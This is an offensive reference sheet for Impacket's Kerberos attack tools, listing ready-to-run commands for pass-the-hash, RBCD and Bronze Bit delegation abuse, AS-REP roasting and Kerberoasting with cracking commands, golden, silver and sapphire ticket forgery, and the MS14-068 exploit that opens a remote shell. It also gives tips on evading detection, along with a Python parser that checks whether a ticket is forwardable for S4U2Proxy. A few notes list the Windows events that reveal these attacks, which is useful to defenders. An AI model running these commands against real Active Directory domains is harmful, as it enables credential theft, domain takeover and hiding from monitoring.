Impacket - Kerberos

Quick Reference

Tool                 Purpose
getTGT.py            Request a TGT and save it as a ccache
getST.py             Request a Service Ticket; S4U2Self/S4U2Proxy for delegation abuse
GetNPUsers.py        AS-REP Roasting: find accounts that do not require Kerberos pre-authentication
GetUserSPNs.py       Kerberoasting: find accounts with SPNs and request their service tickets
ticketer.py          Forge golden, silver, or sapphire tickets
ticketConverter.py   Convert between ccache and kirbi (Mimikatz/Rubeus) formats
tgssub.py            Substitute the sname/SPN in an existing service ticket
goldenPac.py         MS14-068 exploit: privilege escalation via PAC forgery

getTGT.py

Given a password, NT hash, or AES key, requests a TGT from the KDC and saves it as a ccache file.

Syntax:

getTGT.py [options] <domain>/<username>[:<password>]

Common Usage:

# Password auth
getTGT.py <domain>/<username>:<password>

# Pass-the-Hash (only the NT half is used; leave the LM half empty or use aad3b435b51404eeaad3b435b51404ee)
getTGT.py -hashes :<nt-hash> <domain>/<username>

# AES key (128- or 256-bit, hex); avoids RC4 and the etype 0x17 telltale in 4768/4769 events
getTGT.py -aesKey <aes-key> <domain>/<username>

# Specify DC
getTGT.py -dc-ip <dc-ip> <domain>/<username>:<password>

# Request a service ticket directly in the AS-REQ (no separate TGS-REQ)
getTGT.py -service <spn> <domain>/<username>:<password>

Options:
- -hashes <lm-hash>:<nt-hash> - NTLM hash auth (the LM half may be empty)
- -aesKey <aes-key> - AES-128 or AES-256 Kerberos key (hex)
- -dc-ip <dc-ip> - KDC/DC IP address
- -service <spn> - Request a service ticket directly through the AS-REQ
- -principalType <type> - Principal type (default: NT_PRINCIPAL)

Notes:
- Output file is <username>.ccache in the current directory
- Run export KRB5CCNAME=<username>.ccache (an absolute path is safest) before any Impacket tool invoked with -k -no-pass
- More than 5 minutes of clock skew between the attacker host and the KDC yields KRB_AP_ERR_SKEW; sync against the DC first (e.g. ntpdate <dc-ip>)


getST.py

Request a Service Ticket. Supports S4U2Self and S4U2Proxy for delegation abuse (RBCD, KCD with protocol transition).

Syntax:

getST.py [options] <domain>/<username>[:<password>]

Common Usage:

# Standard service ticket (password)
getST.py -spn <spn> <domain>/<username>:<password>

# S4U2Self only: a ticket to the requesting service itself, impersonating the target user (no S4U2Proxy)
getST.py -spn <spn> -impersonate <username> -self <domain>/<username>:<password>

# S4U2Proxy with a forwardable ticket obtained earlier (e.g. an S4U2Self ticket saved with -self)
getST.py -spn <spn> -impersonate <username> \
  -additional-ticket <ticket.ccache> \
  -hashes <lm-hash>:<nt-hash> <domain>/<username>

# RBCD, common pattern: S4U2Self + S4U2Proxy in one run from the attacker-controlled machine account
getST.py -spn cifs/<target> -impersonate Administrator \
  -dc-ip <dc-ip> -hashes <lm-hash>:<nt-hash> <domain>/<attackerpc$>

# Bronze Bit (CVE-2020-17049): flip the forwardable bit on the S4U2Self ticket; works when the
# impersonated user is in Protected Users / marked sensitive, or KCD is configured without protocol transition
getST.py -spn <spn> -impersonate <username> -force-forwardable \
  -hashes <lm-hash>:<nt-hash> <domain>/<username>

# Cross-domain (ticket for an SPN in a different domain)
getST.py -spn <spn> -dc-ip <dc-ip> <domain>/<username>:<password>

# Substitute the service name in the ticket after obtaining it (altservice)
getST.py -spn <spn> -altservice <spn> <domain>/<username>:<password>

# Pass-the-Hash
getST.py -spn <spn> -hashes <lm-hash>:<nt-hash> <domain>/<username>

# AES key
getST.py -spn <spn> -aesKey <aes-key> <domain>/<username>

# Kerberos from ccache
KRB5CCNAME=<ticket.ccache> getST.py -spn <spn> -k -no-pass <domain>/<username>

# dMSA (delegated Managed Service Account)
getST.py -spn <spn> -dmsa <domain>/<username>:<password>

Options:
- -spn <spn> - Target SPN (e.g., cifs/<target>, http/<target>)
- -altservice <spn> - Override the sname in the ticket after obtaining it (only for a service run by the same account, see tgssub.py)
- -impersonate <username> - User to impersonate via S4U2Self
- -additional-ticket <ticket.ccache> - Forwardable ticket to present in S4U2Proxy
- -self - Only perform S4U2Self, skip S4U2Proxy
- -force-forwardable - Force the S4U2Self ticket to be forwardable (CVE-2020-17049, Bronze Bit)
- -u2u - User-to-User ticket request
- -renew - Renew a TGT (use with -spn krbtgt/<domain>)
- -dmsa - Use dMSA authentication
- -hashes <lm-hash>:<nt-hash> - NTLM hash auth
- -aesKey <aes-key> - AES Kerberos key
- -k / -no-pass - Kerberos via ccache (KRB5CCNAME)
- -dc-ip <dc-ip> - KDC IP

Notes:
- Output: a ccache named after the impersonated user (or the requesting user) and the SPN; the exact filename is printed as "Saving ticket in ..."
- S4U2Proxy answers KDC_ERR_BADOPTION when the S4U2Self ticket is not forwardable (impersonated user in Protected Users or marked "sensitive and cannot be delegated", or the delegating account lacks TrustedToAuthForDelegation); -force-forwardable addresses that case only on DCs missing the CVE-2020-17049 patch
- For RBCD: write delegation attribute with rbcd.py first, then call getST
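Before the S4U2Proxy step it is worth checking what a ccache really holds: the right SPN, a still-valid lifetime, and the FORWARDABLE flag that S4U2Proxy insists on. The parser below is an added example written for this page, not part of Impacket. It reads the MIT ccache v3/v4 layout that Impacket and kinit write (version word, optional v4 header, default principal, then a sequence of credentials with big-endian length-prefixed fields). The sample ccache it inspects is constructed inline with a minimal writer; its ticket body is placeholder bytes, not a real DER Ticket, and the principal names, times and key are made up.

```python
"""Added example (not Impacket code): read an MIT ccache (v3/v4, what Impacket and kinit write),
list its credentials and check that a ticket meant for getST -additional-ticket is unexpired and
FORWARDABLE. The sample ccache is constructed inline; its ticket body is placeholder bytes."""
import struct, time

# ccache ticket_flags bits (MIT TKT_FLG_* values); S4U2Proxy needs "forwardable".
TKT_FLAGS = ((0x40000000, "forwardable"), (0x20000000, "forwarded"), (0x10000000, "proxiable"),
             (0x08000000, "proxy"), (0x00800000, "renewable"), (0x00400000, "initial"),
             (0x00200000, "pre_authent"), (0x00040000, "ok_as_delegate"))

class _Reader:
    """Cursor over the big-endian ccache layout."""
    def __init__(self, buf):
        self.buf, self.pos = buf, 0
    def take(self, n):
        chunk = self.buf[self.pos:self.pos + n]
        if len(chunk) != n:
            raise ValueError("truncated ccache")
        self.pos += n
        return chunk
    def u8(self): return self.take(1)[0]
    def u16(self): return struct.unpack(">H", self.take(2))[0]
    def u32(self): return struct.unpack(">I", self.take(4))[0]
    def data(self): return self.take(self.u32())     # uint32 length + bytes

def _principal(r):
    r.u32()                                            # name_type, not needed for display
    count = r.u32()
    realm = r.data().decode()
    return "/".join(r.data().decode() for _ in range(count)) + "@" + realm

def parse_ccache(buf):
    """Return {'default_principal': str, 'credentials': [dict, ...]}."""
    r = _Reader(buf)
    version = r.u16()
    if version not in (0x0503, 0x0504):
        raise ValueError("unsupported ccache version 0x%04x" % version)
    if version == 0x0504:
        r.take(r.u16())                                # v4 header block (delta-time tag)
    out = {"default_principal": _principal(r), "credentials": []}
    while r.pos < len(r.buf):
        c = {"client": _principal(r), "server": _principal(r), "etype": r.u16()}
        if version == 0x0503:
            r.u16()                                    # v3 repeats the enctype
        c["session_key"] = r.data()
        c["authtime"], c["starttime"], c["endtime"], c["renew_till"] = [r.u32() for _ in range(4)]
        r.u8()                                         # is_skey
        flags = r.u32()
        c["flags"] = [name for bit, name in TKT_FLAGS if flags & bit]
        for _ in range(r.u32()): r.u16(); r.data()     # addresses
        for _ in range(r.u32()): r.u16(); r.data()     # authorization data
        c["ticket"], c["second_ticket"] = r.data(), r.data()
        out["credentials"].append(c)
    return out

def usable_for_s4u2proxy(buf, now=None):
    """Server principals of tickets S4U2Proxy will accept: forwardable and currently valid."""
    now = time.time() if now is None else now
    return [c["server"] for c in parse_ccache(buf)["credentials"]
            if "forwardable" in c["flags"] and c["starttime"] <= now < c["endtime"]]

# Minimal v4 writer, only so the example has a file to read.
def _enc_data(b):
    return struct.pack(">I", len(b)) + b

def _enc_principal(name, name_type=1):
    comps, realm = name.rsplit("@", 1)
    parts = comps.split("/")
    return struct.pack(">II", name_type, len(parts)) + _enc_data(realm.encode()) + b"".join(
        _enc_data(p.encode()) for p in parts)

def build_ccache(client, server, etype, key, start, end, flags, ticket):
    out = struct.pack(">HHHH", 0x0504, 12, 1, 8) + b"\x00" * 8   # version, header: deltatime tag
    out += _enc_principal(client) + _enc_principal(client) + _enc_principal(server, 2)
    out += struct.pack(">H", etype) + _enc_data(key) + struct.pack(">IIII", start, start, end, end)
    out += b"\x00" + struct.pack(">III", flags, 0, 0)            # is_skey, flags, no addrs/authdata
    return out + _enc_data(ticket) + _enc_data(b"")

# Constructed sample: the kind of ticket getST -self would save for the attacker machine account.
T0 = 1_700_000_000
_TICKET = b"\x61\x82\x01\x00placeholder"
SAMPLE_OK = build_ccache("Administrator@LAB.LOCAL", "attackerpc$@LAB.LOCAL", 18, b"k" * 32,
                         T0, T0 + 36000, 0x40E00000, _TICKET)
SAMPLE_NOT_FWD = build_ccache("Administrator@LAB.LOCAL", "attackerpc$@LAB.LOCAL", 18, b"k" * 32,
                              T0, T0 + 36000, 0x00E00000, _TICKET)

if __name__ == "__main__":
    for c in parse_ccache(SAMPLE_OK)["credentials"]:
        print(c["client"], "->", c["server"], "etype", c["etype"], c["flags"])
    print("usable for S4U2Proxy:", usable_for_s4u2proxy(SAMPLE_OK, now=T0 + 60))
```

On a real file, `parse_ccache(open(os.environ["KRB5CCNAME"], "rb").read())` gives the same dictionaries; an empty result from `usable_for_s4u2proxy` before the `-additional-ticket` run means the ticket is expired or not forwardable, which is exactly the situation that later surfaces as KDC_ERR_BADOPTION.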


GetNPUsers.py

AS-REP Roasting: query the domain for accounts with "Do not require Kerberos preauthentication" set (UF_DONT_REQUIRE_PREAUTH) and, for each, request an AS-REP whose encrypted part, keyed with the account's password, can be cracked offline.

Syntax:

GetNPUsers.py [options] <domain>[/<username>[:<password>]]

Common Usage:

# List vulnerable accounts (authenticated LDAP query)
GetNPUsers.py <domain>/<username>:<password> -dc-ip <dc-ip>

# Request the AS-REPs and write them to a file (hashcat format)
GetNPUsers.py <domain>/<username>:<password> -request -outputfile <output> -dc-ip <dc-ip>

# Unauthenticated: no LDAP, one AS-REQ per name in the list
GetNPUsers.py <domain>/ -usersfile users.txt -request -no-pass -dc-ip <dc-ip>

# Pass-the-Hash
GetNPUsers.py -hashes <lm-hash>:<nt-hash> <domain>/<username> -request -dc-ip <dc-ip>

# John format
GetNPUsers.py <domain>/<username>:<password> -request -format john -outputfile <output>

Options:
- -request - Actually request the AS-REPs (not just enumerate)
- -outputfile <output> - Write hashes to file
- -format {hashcat,john} - Output format (default: hashcat)
- -usersfile <file> - File of usernames to test (one per line); with -no-pass no credentials are needed
- -hashes <lm-hash>:<nt-hash> - NTLM hash auth
- -dc-ip <dc-ip> - DC IP
- -dc-host <hostname> - DC hostname

Notes:
- With -usersfile the KDC's answer doubles as user enumeration: KDC_ERR_C_PRINCIPAL_UNKNOWN means the account does not exist, KDC_ERR_PREAUTH_REQUIRED means it exists but is not roastable
- Output lines look like $krb5asrep$23$<user>@<DOMAIN>:<checksum>$<encrypted data>: the AS-REP enc-part under the user's RC4 key, which is what mode 18200 expects
- Detection: roasted accounts show up as 4768 events with Pre-Authentication Type 0 (and usually Ticket Encryption Type 0x17); nonexistent names produce 4768 failures with result code 0x6

Crack with:

hashcat -m 18200 <output> /path/to/wordlist
john --format=krb5asrep --wordlist=/path/to/wordlist <output>


GetUserSPNs.py

Kerberoasting: query the domain for user accounts that have an SPN and request a service ticket for each; the ticket's encrypted part is keyed with the service account's password and can be cracked offline.

Syntax:

GetUserSPNs.py [options] <domain>[/<username>[:<password>]]

Common Usage:

# List SPNs
GetUserSPNs.py <domain>/<username>:<password> -dc-ip <dc-ip>

# Request TGS hashes and write them to a file
GetUserSPNs.py <domain>/<username>:<password> -request -outputfile <output> -dc-ip <dc-ip>

# Request a TGS for a single user
GetUserSPNs.py <domain>/<username>:<password> -request-user <username> -dc-ip <dc-ip>

# Save each TGS as an individual ccache file (implies -request)
GetUserSPNs.py <domain>/<username>:<password> -save -dc-ip <dc-ip>

# Pass-the-Hash
GetUserSPNs.py -hashes <lm-hash>:<nt-hash> <domain>/<username> -request -dc-ip <dc-ip>

# Kerberoast across a trust (authenticate to <domain>, query and request in <target-domain>)
GetUserSPNs.py <domain>/<username>:<password> -target-domain <target-domain> -request -dc-ip <dc-ip>

# No-preauth account (roast without credentials: users.txt lists the accounts to roast, each is
# requested as the service of an AS-REQ sent as the no-preauth account)
GetUserSPNs.py <domain>/ -no-preauth <username> -usersfile users.txt -dc-ip <dc-ip>

# Machine accounts only
GetUserSPNs.py <domain>/<username>:<password> -machine-only -dc-ip <dc-ip>

# Stealth (drops the servicePrincipalName=* LDAP filter; memory-heavy on large domains)
GetUserSPNs.py <domain>/<username>:<password> -stealth -dc-ip <dc-ip>

Options:
- -request - Request TGS tickets and print them in JtR/hashcat format
- -request-user <username> - Request a TGS for a specific user
- -request-machine <machinename> - Request a TGS for a specific machine
- -save - Save tickets to disk as ccache files
- -outputfile <output> - Write hashes to file
- -target-domain <domain> - Query/request across a trust
- -no-preauth <username> - Use a no-preauth account to roast without credentials
- -stealth - Remove the SPN filter from the LDAP query
- -machine-only - Query machine accounts only
- -usersfile <file> - User list
- -hashes <lm-hash>:<nt-hash> - NTLM hash auth
- -dc-ip <dc-ip> - DC IP
- -dc-host <hostname> - DC hostname

Notes:
- Output lines look like $krb5tgs$23$*<user>$<DOMAIN>$<spn>*$<checksum>$<encrypted data>; mode 13100 is for these RC4 (etype 23) hashes
- Accounts with "This account supports Kerberos AES ... encryption" set may come back as $krb5tgs$17$ or $krb5tgs$18$, which need modes 19600/19700 and crack far slower
- Detection: every request logs a 4769 on the DC; a burst of 4769 events with Ticket Encryption Type 0x17 from one client is the classic Kerberoasting signature

Crack with:

hashcat -m 13100 <output> /path/to/wordlist
john --format=krb5tgs --wordlist=/path/to/wordlist <output>


ticketer.py

Forge golden tickets (signed with the krbtgt key), silver tickets (signed with a service account key), or sapphire tickets (a real PAC fetched via S4U2Self+U2U, re-signed with the krbtgt key).

Syntax:

ticketer.py [options] -domain <domain> -domain-sid <sid> <username>

Common Usage:

# Golden ticket (krbtgt NT hash)
ticketer.py -nthash <nt-hash> -domain-sid <sid> -domain <domain> Administrator

# Golden ticket (krbtgt AES-256 key)
ticketer.py -aesKey <aes256-key> -domain-sid <sid> -domain <domain> Administrator

# Golden ticket with an extra SID (DA in a child domain -> Enterprise Admins of the forest root;
# the extra SID is built from the ROOT domain's SID, not the child's)
ticketer.py -nthash <nt-hash> -domain-sid <sid> -domain <domain> \
  -extra-sid <root-domain-sid>-519 Administrator

# Silver ticket (service account NT hash, specific SPN)
ticketer.py -nthash <nt-hash> -domain-sid <sid> -domain <domain> \
  -spn <spn> Administrator

# Silver ticket (AES key)
ticketer.py -aesKey <aes256-key> -domain-sid <sid> -domain <domain> \
  -spn <spn> Administrator

# Sapphire ticket: with a low-privileged account, request a real ticket for the impersonated user
# (S4U2Self+U2U), copy its PAC and re-sign with the krbtgt key (-request and -user/-password required)
ticketer.py -request -impersonate Administrator -domain <domain> -domain-sid <sid> \
  -user <username> -password <password> -aesKey <krbtgt-aes256-key> -dc-ip <dc-ip> Administrator

# Custom groups (default: 513,512,520,518,519; 512 = Domain Admins, 519 = Enterprise Admins)
ticketer.py -nthash <nt-hash> -domain-sid <sid> -domain <domain> \
  -groups 512,513,518,519,520 Administrator

# Custom duration (hours)
ticketer.py -nthash <nt-hash> -domain-sid <sid> -domain <domain> \
  -duration 8760 Administrator

Options:
- -domain <domain> - FQDN of the domain (required)
- -domain-sid <sid> - Domain SID (required; get it with lookupsid.py)
- -nthash <nt-hash> - NT hash for signing (krbtgt for golden, service account for silver)
- -aesKey <aes-key> - AES key for signing (preferred over the NT hash; an RC4-signed ticket shows up as etype 0x17 in 4768/4769 events)
- -spn <spn> - SPN for a silver ticket (omit for a golden ticket)
- -impersonate <username> - Sapphire ticket: impersonate this user
- -request - Request a real ticket from the DC and clone it, changing only the supplied fields (required for sapphire, together with -user and -password or -hashes)
- -user <username> / -password <password> - Credentials used together with -request
- -groups <groups> - Comma-separated group RIDs
- -user-id <id> - RID of the ticket user (default: 500)
- -extra-sid <sid> - Extra SIDs for the PAC (e.g., <root-domain-sid>-519 across a trust)
- -extra-pac - Include extra PAC entries (UPN_DNS)
- -old-pac - Use the old PAC structure (no PAC_ATTRIBUTES_INFO / PAC_REQUESTOR)
- -duration <hours> - Ticket lifetime in hours (default: 87600 = 10 years)
- -dc-ip <dc-ip> - DC IP (required for sapphire and -request)

Notes:
- Output: <username>.ccache
- Use export KRB5CCNAME=<username>.ccache before use
- Get domain SID: lookupsid.py <domain>/<username>:<password>@<dc-ip> | grep 'Domain SID'
- DCs with the November 2021 PAC update (KB5008380, enforced since October 2022) validate PAC_REQUESTOR: the positional username must be an existing account and -user-id its real RID (the default 500 only fits the built-in Administrator); an invented username or -old-pac only works against DCs that never got the update
- Nothing stops the 10-year default lifetime, since the KDC never issued the ticket, but a ticket that outlives the domain's maximum TGT lifetime (10 h by default) stands out in any ticket dump; -duration 10 blends in


ticketConverter.py

Convert Kerberos tickets between ccache (Linux/MIT) and kirbi/KRB-CRED (Mimikatz/Rubeus/Windows) formats.

Syntax:

ticketConverter.py <input_file> <output_file>

Common Usage:

# kirbi -> ccache (Mimikatz/Rubeus output -> Linux use)
ticketConverter.py ticket.kirbi ticket.ccache

# ccache -> kirbi (Linux -> Rubeus/Mimikatz use)
ticketConverter.py ticket.ccache ticket.kirbi

Notes:
- The input format is auto-detected from the file content; the output is written in the other format
- A .kirbi file is a DER-encoded KRB-CRED structure. Mimikatz (kerberos::list /export) writes it in that raw form; Rubeus prints the same structure base64-encoded, so decode it first (base64 -d rubeus.b64 > ticket.kirbi) before converting
- Import on Windows: Rubeus.exe ptt /ticket:ticket.kirbi (a base64 string is accepted too), or Mimikatz kerberos::ptt ticket.kirbi
- Use export KRB5CCNAME=ticket.ccache after conversion


tgssub.py

Substitute the sname (service class and/or host) in an existing service ticket. Useful when you hold a ticket for one service and need another service that runs under the same account, e.g. HOST/CIFS/LDAP on the same machine account, or HTTP and MSSQLSvc under one service account.

Syntax:

tgssub.py -in <ticket.ccache> -out <ticket.ccache> -altservice <service>

Common Usage:

# Change the service in the ticket (e.g., HTTP -> CIFS on the same host, for lateral movement)
tgssub.py -in <ticket> -out <output> -altservice cifs/<target>

# Force the substitution regardless of the original service
tgssub.py -in <ticket> -out <output> -altservice ldap/<target> -force

Options:
- -in <ticket.ccache> - Input ccache
- -out <ticket.ccache> - Output ccache
- -altservice <service> - New sname/SPN to set
- -force - Substitute without considering the original sname

Notes:
- Only the cleartext sname of the Ticket is rewritten; the encrypted part is untouched and nothing is re-signed, so no key is needed
- It works because the receiving service merely decrypts the ticket with its own long-term key and never compares the sname against anything inside the encrypted part. The new service must therefore be served by the same account (same key) as the original: a ticket for HTTP/app01 issued to a dedicated service account cannot become CIFS/app01, which is decrypted with the machine account's key


goldenPac.py

MS14-068 exploit: forge a PAC that an unpatched KDC accepts, so a regular domain account receives a TGT carrying Domain Admin group membership.

Syntax:

goldenPac.py [options] <domain>/<username>:<password>@<target> [command]

Common Usage:

# Exploit and drop into a PSEXEC shell on <target>
goldenPac.py -dc-ip <dc-ip> <domain>/<username>:<password>@<target>

# Only save the forged-PAC TGT, do not PSEXEC ("None" as the command skips execution)
goldenPac.py -dc-ip <dc-ip> -w <output> <domain>/<username>:<password>@<target> None

# Pass-the-Hash
goldenPac.py -hashes <lm-hash>:<nt-hash> -dc-ip <dc-ip> <domain>/<username>@<target>

# Execute a custom command
goldenPac.py -dc-ip <dc-ip> <domain>/<username>:<password>@<target> <command>

Options:
- -dc-ip <dc-ip> - DC IP (required)
- -target-ip <target> - Target host IP (if different from the target name)
- -hashes <lm-hash>:<nt-hash> - NTLM hash auth
- -w <pathname> - Save the forged TGT to a ccache file
- -c <pathname> - Upload a binary and execute it instead of cmd.exe

Notes:
- Requires a DC without the MS14-068 fix (KB3011780): a vulnerable KDC accepted PAC signatures made with unkeyed checksums (plain MD5), so the client could ship its own PAC in the TGS-REQ
- The DC is what must be vulnerable; <target> is any domain member the resulting ticket is used against (the DC itself included)
- The forged PAC puts the user in Domain Admins (512) and the other default privileged groups (513, 518, 519, 520)
- Affects DCs up to Windows Server 2012 R2 that never received the fix; on a patched DC the request simply fails